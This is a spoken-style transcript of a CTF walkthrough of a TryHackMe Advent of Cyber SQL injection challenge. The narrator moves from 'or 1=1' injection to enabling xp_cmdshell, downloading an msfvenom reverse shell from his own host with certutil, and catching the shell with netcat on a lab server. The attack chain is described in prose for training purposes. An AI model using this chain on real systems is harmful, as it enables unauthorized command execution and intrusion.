Yo, what's going on, guys? Welcome back to day 10 of the Cyber Advent, whatever you want to call it, for TryHackMe. Advent Challenge, Advent Calendar, whatever. All right, so we're continuing with our, I guess, story. I'm not really reading the story, but you can imagine. So what we're doing is we're hopping in, and today we're doing SQL injections. So if you guys are interested in SQL injections, if you guys like this content, if you want to see more of it, let me know. Hit that like button, hit that sub button. Also, put in the comments that you want me to do more SQL injection, because some people, I do it in the live streams and then people don't really ask for videos of it, so I don't know if they need it or what the case is. Okay, so let's go and hop into it. So this is one thing I actually like about TryHackMe that they've done, is they've added in here what you're going to need for the day, because there's some days if I don't have very long, if it says I need to start a attack box, I'll be like, I'll come back to it. Like, I'm not going to start it because I don't have very long. And if you don't have to read the whole thing to know that. So I like that a lot. Okay, so we're going to do SQL injection. So SQL queries are SQL language. You need to know at least bare minimum to get by in this box. So one thing I don't think they do very well here is you're not going to learn SQL in a matter of reading this. Okay, so I appreciate what they're trying to do, but I think this is going to be, you're expected to know a little bit of SQL before this, so just know that. So what we're going to do is we're going to show what is SQL statement is. So this is what SQL language looks like. So this is going to say select. So a SQL database looks like this. It's tables, rows, columns. Okay, this is a table. These are rows right here, like ornament ID. These are rows and these are columns. Okay, think of a column that holds up a building, right? Those are columns. They're vertical. Think of a row, horizontal. Okay, so and the table's the whole thing. So here we're saying select everything from, in the table name here is table ornaments, where the material equals wood. Okay, well, there's only one thing that equals wood, so you should get, when you do that query, you will get this, just that row. You won't get everything. You'll just get that row, right? And I don't know why they didn't show it there, but maybe they're just saying run this and then you'll be all right. Now, the next one is select ornament ID. So select the ornament ID, show us the ornament ID, the color, and the category. So we're going to get these three results from table ornaments. That's what table we're in, where ELF ID is 102. So this will show us that the ornament ID, the color, and the category just for this one. Okay, so hopefully that makes a little sense. You can read it at least, because it's pretty standard. I mean, pretty simple the way it reads. It reads pretty simply. I'm not going to sit here and go into all of them. Now, they're talking about PHP and how that comes into play. Okay, again, they're expecting you to know a lot here on how backend databases work and all that stuff. Don't worry about that. You don't need that for this challenge. If you're not familiar with it, don't read this portion. Or I'm not saying don't read it. You need to know the information, but don't put this portion in your head and go, well, I don't know how this works. It doesn't matter. You just need the SQL piece for this challenge. And the only reason I say that is because I think TryHackMe has done this a few times here, and they throw too much information at you, where if you don't understand what you're looking at, you're like, what does this have to do with that? And then you get confused and it's too much. The PHP piece, I think it was too much for this, personally. That's only if you're trying to, it depends on who their audience is. If their audience is people that already are in cyber, then absolutely this makes sense. If their audience is people that have no experience, this is a little bit much in my opinion, but again, that's an opinion, it's not fact. So what they're saying is this is the data flow. So you're gonna say, okay, here's my SQL, obtain the data, it's gonna go to the web browser, and then the page request gets the PHP file and goes back to the, okay, so what they're saying is the PHP file is going to call back or interact with the actual SQL server and say, hey, I need XYZ, whatever, and then the SQL server is going to give it back, okay? So the PHP file is kind of, think of it as a connector, right? It's the connector from the web browser to the SQL server. So now we have user input. So this is what a GET request looks like, okay? If you've never seen it here, didn't make it any bigger, but you can see it now. So we have the http://example.com, blah, blah, blah. And then you have the search.php, okay? When you go to search for something, it's stored in the database. So they're saying, here we're searching for the color green. That's what it'll look like. When you send that request, You don't have to, theoretically, if you don't want to use the search bar every time you do the search, you can just go up to there and change the color and say blue, orange, whatever. And it's going to keep sending it back because that's a GET request. It's asking for those parameters and it's sending it as a GET request. Now, a lot of times these are sent as post requests, and then the information is actually stored in the body, not in the header up here. So just know that if you don't see this, and you can do a little bit of recon, but you can tell it's probably a post request if it's still searching for something. Just know that there is a difference. Okay, so now you can see select everything from table where color is. Okay, so here's where we're getting in the actual injection. So you can see if you know how SQL language works, you can break it. So obviously, when you do this color green here, you're not writing out the whole query. You're not saying select everything from table ornaments where color, right? You don't know what table they're in, for one. For two, you don't know what's in that table. You don't know what you're even searching for. So what you're going to do is you're going to let it run this. This is the piece that it runs, right? And all it's asking you to put is green or blue or orange or whatever. Well, what we're going to do is we're going to say, okay, cool. What happens when we break that, right? What happens when we say, no, I want to do what I want to do? Well, when you see here, they put a space, they put these quotes in here. Why did they put those quotes in there? Well, the way a SQL statement works is it will have this one quote, and then you put green, and then it puts another quote there. Why does it do that? Because it wants it to be in quotes, just like any other string, so it knows what it's doing. So the SQL database is running this command when you put something, and then you're just putting green, and it automatically puts the other quote in there for you. So if we put the other quote in there, like they did here, then we're telling it, okay, you read it, go to the next piece. And the next piece is or 1 equals 1, which is a true Boolean statement. What does that mean? It means it's true. 1 does equal 1, right? At least the last time I checked. So what does that mean? If we're saying select everything from the table where color equals whatever, or 1 equals 1, this will always be true. So select everything from the statement. Give me everything because it's true. So it's just SQL doesn't understand. It's saying, okay, it's true. You asked for everything and it's true, so here's everything. That's what we're doing. So that's an easy statement. Now, it does say a caution around 1 equals 1. I will tell you this as well. Number one, 1 equals 1 has been around a long time. A lot of places are not vulnerable to it. But the biggest thing is if you accidentally, I don't want to say this around 1 equals 1. I want to say this around all SQL statements. Okay, a lot of SQL statements, a lot of SQL injections, are done, some of them are blind, some of them are not, whatever. But the point is you may not see a direct something come back to you, okay? The reason that's scary if you don't know what you're doing is you could do something that you have no idea. For instance, they talk about it here. You could update or delete something in the database. When you're doing a pen test, okay, and you're doing SQL injection, if you edit somebody else's or a company's or whatever's file, if you edit their SQL database, and you might have deleted something that was like important and they didn't take backups or whatever, guess what? You might just cost them a load of money. And I've seen it happen. So be careful with SQL injections. Make sure you know what you're doing. Also, make sure when you're doing it with a pen test, if you say, hey, I found your website's vulnerable to SQL injection, can you go ahead and take a backup and I'll run these commands and see what we can get? Do it that way. Don't do it the way. Now, if the company insists that you do it the way, just don't ask us, just do it, then make sure you get it in writing because you can break a lot of stuff, especially if it's blind and you don't know what you're doing. So here is, you can see here, they're saying, okay, stacked queries. What is a stacked query? Well, it's exactly what it sounds like, right? They have a query here, then they add the next query, and then boom, they have another query. Well, they end the query and put comments, but it is a query here, and then they're inserting something in there. So they're stacking queries, right? They're saying, hey, select everything from the table ornaments where the color is blank. So that's where you'll put where your query starts. They put blank in there, and then they put a colon. That semicolon now starts a new query. So it's stacked on top of the old query. Okay. So now we're going to test for SQL injection. So I'm just going to, as we're going through this, I'm going to answer the questions. So let's go ahead. We're going to visit this website. HTTP. And I will tell you, SQL injections get very complex. Luckily for us, this one's not. Okay, and the first question on this, and you can see they've edited the website. The website has been defaced. We're screwed. What do we do? Now it's saying manually navigate the defaced website to find the vulnerable search form. Well, the only one that I see that has a search function is gift search. So we click there. Okay, start my gift search. Oh, look at that. /giftsearch.php. Bingo. Now, the first thing we're going to do that I would do anyway is just select something. Doesn't really matter what the budget is, and just search. I just want to see what the search looks like. Ah, look at that. We see right away they're doing a GET request because the search parameters are right up here. So let's just make it error out. Let's just say we want it to error, right? We can put anything in here. We can put blah, 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 whatever. We want it to error. Okay, so we just put something that doesn't make sense, we get an error. Well, here's the thing. If you get an error like this, they've already misconfigured their server, because you should not be getting errors, because now we know not only what they're using, we also know what driver they're using right here, ODBC driver 17 for SQL Server. So right there's the answer. So you're getting a lot of information just off the error message. So they should not have that error message. So that would be a small finding in a pen test as well. So now let's see, inject the 1 = 1 condition. Okay, so let's go ahead and say age equals, and we'll give the little quotes. Okay, and then we'll say or 1 = 1. This is very slow, so bear with me. Okay, I missed it. You can see I mistyped it. So let's see where we mistyped it. Let's go back up. There it is. I did not put the quote at the end. And I didn't put the spacing correctly, but that's all right. This thing is very hard to deal with, I'll be honest with you. Come on. Okay, we're going to put... Okay, we got that in there. Now we say or 1 = 1, and then I didn't put a space in the comments. There's the... Okay, there's not the issue. Okay, so let's go back up here, because I want to actually change this. I don't think that's the way I want it. Okay, there is a space. It's hard to tell if there's a space. So let's do green. Or age, I'm sorry. So let's do 12. There we go. So we didn't have a valid entry in there. That's what it was. So we needed it to be invalid entry. So we did 12. You could do 1. You could do whatever age. And then you say or 1 = 1. So or true. Let's scroll all the way to the bottom because it's asking you for the last one. Come on. There we go. Last one is the flag. So let's go back down. There you go. First flag. Pretty easy. That one's pretty easy. Now, I say use caution with this because almost everyone knows about this specific syntax, meaning if you try and put this into a lot of websites, they're not only going to have it blocked, but they're also going to probably start tracking your IP to see on that website to see what you're doing. And they may just block your IP in general because they know that's not common. Nobody's putting that in on accident, right? So now it says what flag is in the note file. Well, let's go back up to where we left off because I want to keep going through. Where did we leave off here? Oh, testing for SQL injection. Okay, so you can see, okay, they did it actually differently than we did, looks like. Yeah, we didn't do that. Yeah, they did it a little differently. They, instead of putting a legit age, they just put a 1 comma there to end the thing and go to the next one. I wanted to put a legit age, just I don't know why. Anyway, so let's go ahead and go into it. So we already know it's vulnerable. As soon as you see this, you know SQL injection is possible because you just did it. So now calling stored procedure. So what's a stored procedure? A stored procedure is basically a procedure that is already in the database stored, okay? So it's a complex query. It might be 10 lines, it might be 20 lines, it could be 100 lines, it doesn't matter. It's a complex query. Some of these are custom, some of them come by whatever server you're using. So this one in this case is Windows. So some of them come by default. So what that means is we can call on them and it will run that complex query for us, and we don't have to type out that whole query. We don't have to have it memorized, we don't have to follow it, blah, blah. Well, this one, since it's a Microsoft SQL Server, they have a storage procedure called XP command shell. What's this do? Allows us to do exactly what it says. Command line arguments. So we can actually run commands on the server. Now, here's the problem. It's not turned on here, okay? So what do? Well, we know we can actually run commands here. So what do? We say, hey, let's run the command to turn it on. So we say, okay. So here they actually copy the exact, they give you the exact parameters, and we'll go through these. So we'll copy it, and then we'll paste it, okay? So now what we're gonna do is, you see, it says HTTP, gift results, blah, blah, age, so they did the exact same payload, and then you can see up here, it says execute SP configure, which you can see up here, SP configure, show advanced options 1. So they have to turn on the advanced options first. That's what 1 is. 1 is true. Now, then reconfigure, SP configure, and put command shell 1. Turn on command shell, okay? So we're putting all of that in the GET request, the top, okay? So up here in the GET request. Now you can see it says, sorry, your search returned no results. This looks like to us that it didn't work, right? This is actually really good. The reason it's good is because we didn't get an error. Remember, the error is like all that red text? We didn't get an error. That tells us right away it probably worked. Well, now we have to test it, right? So let's go ahead and test it. So what we're going to do to test it is we're going to say MSF Venom. Basically what we're going to do to test it is we're going to upload a file to it. If it takes the file, if we can actually upload it, then we know it worked, right? So we're going to say MSF Venom payload, and we're going to say Windows x64 shell reverse TCP lhost, and then this equals our host, so 10.10.145.53, okay, and then the L port equals 4444 is Metasploit's default port, okay, and then we're going to say we want the file to be an executable, and we'll name it reverse.exe. Now, when I hit enter, I think I already have one on here, so it might just say, do you want to, or it might just do it. We'll see. Let's see if it does it, or if it says it errors out because I already have one. Let's make this a little bit bigger for you guys, so you can see. And what this is we're just making a simple reverse shell using MSF Venom. So it did save it, so that's good. It didn't have to mess with anything. Now we're going to host it. So we're going to say Python 3 techm http.server 8000. So all this is doing is hosting it. And, well, I mistyped something. Oh, I bet you I know what. Yep, it's still hosting over here. Okay, so we'll host it again. So we're hosting it over here. So we'll get rid of this because we're already hosting it on the other screen. So now it is sitting here at our directory. So what I mean by that is, let's look at this just to show proof of concept here. We'll say HTTP 127.0.0.1 8000. Here we go. We're hosting all of our files for them. And you can see the reverse.exe is right there. So we're hosting it for them. So we're saying, hey, we got files out here. Come grab them. Well, now what we need to do is we need to run the commands, the SQL commands on the server that grabs those files, or that file, I should say. So here you can see they put it for us. Very easy. This is the actual file. And I'll tell you, this will actually tell us if we're allowed to do this, if we're allowed to run commands on it, because if it grabs our command, we get an instant reaction. You'll see what I mean. So first, don't forget to change your IP, because if you do, it's not going to work. This is the only part that's slow, because if I go too far, it will. There we go. 10.10.145. What was my IP? Look how slow this machine is. 10.10.145.53. So now watch. We'll hit enter, and here we just get, sorry, your search had no results. But here on our server, look at that. Someone actually went and got it. Looks like they retrieved it. Perfect. Okay. So now we know that someone retrieved it. Whoops, we're gonna need that back. So somebody reached out to us, which means Actually, let me make sure here. Yep, that 1010 212 221. They retrieved it. So that's the 1010 212 221 correct IP. So we know we retrieved it. So now all we got to do is set up our listener, because we just put a reverse shell on our machine. So now we just say, hey, netcat lvmp 4444 to listen on port 4444. Okay. Now all we have to do is say, hey, execute our reverse.exe. Okay. So you can see it's actually pretty easy. Once we activated execute command shell, we can do that. We can do whatever we want, right? Because we can execute commands on the server. So we could not set up a reverse shell and still go through our website or through our server and do everything we wanted, because look, we can execute commands. So here, the execute command we did was cert util URL cache, and we said, hey, grab this URL, blah, blah. Perfect, no problem. So now all we gotta do is go back here. Probably have to copy and paste it again. All right. We go to copy. And all we're doing is putting these in the GET request every single time. Now I will tell you, if you've ever used something like Burp Suite, they have a tool called Repeater. It's so much easier for this stuff than putting it in the browser, but you can put it in the browser. So now we're saying, hey, go ahead and run that reverse.exe that you just ran. And then you can see when we go back here, look at that, we have a shell. We are on the machine. We are C Windows System 32. So we've got a full reverse shell. So now it's asking us, what is the flag in the note that they left? Well, everyone that's done a CTF knows. Oh, CD works. I didn't think CD would work. Okay, so LS doesn't work. I know that. So we can go to CD users. And then CD administrator. And then we say dir and the desktop. So anyone that's done a CTF or any CTFs probably knows that 90% of the time they put them on the desktop. They just do it just because. And then we do type note.txt to read it. And look at that. There's your flag right there. So that's the first flag. Now it says here, after you gain access to the server, you can deface the website by running the deface website.batch script and see users. Feel free to dump the database and steal whatever you want. Well, we don't want to do that. If you need to revert the changes back to the original site for any reason, just run restore website back from the same directory. Okay, so let's run it. Restore website.bat. Okay, and that should theoretically restore all of our website. Okay, let's see. Now we get rid of everything and just go back to the home page. We'll refresh it and get this and say enter. Look at that. We're back to the regular website. We restored it. And then here's your flag. Boom. It's that easy. Now, I know SQL injection may sound complex, okay? But once you know there's SQL injection, it's not as complex. The hardest part is finding it, because a lot of times it's blind. There's also a great tool called SQL Map. I recommend it for everybody. It's an awesome tool, so check it out. If you guys like this content, if you guys are doing the Advent of Cyber, hit that like button, hit that sub button, and also let me know which one's your favorite so far, because so far, this one's probably my favorite. I don't think it's the best explained, but this one's probably my favorite. So thanks, guys.